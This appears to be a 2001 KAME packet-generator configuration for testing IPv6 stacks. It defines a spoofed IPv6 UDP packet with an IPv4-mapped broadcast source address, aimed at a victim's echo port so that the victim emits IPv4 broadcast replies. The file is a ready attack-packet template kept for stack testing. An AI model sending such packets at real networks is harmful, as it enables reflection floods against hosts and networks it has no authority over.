#	$KAME: transition-abuse.conf,v 1.1 2001/06/23 14:00:24 itojun Exp $

# abuse of IPv4 mapped address abuse.  under the following conditions:
# - the victim kernel stack does not check against IPv4 mapped address on
#   IPv6 native packet
# - the victim node runs udp echo service (inetd) on AF_INET6 socket
# the victim node can generate IPv4 broadcast responses mistakenly.

v4mapped:\
	:ip6:udp1:

ip6:\
        :ip6_flow#0:ip6_plen=auto:ip6_nxt=auto:ip6_hlim#255:\
        :ip6_src="::ffff:10.255.255.255":\
	:ip6_dst="::ffff:10.0.0.1":

udp1:\
	:udp_sport#7:udp_dport#7:
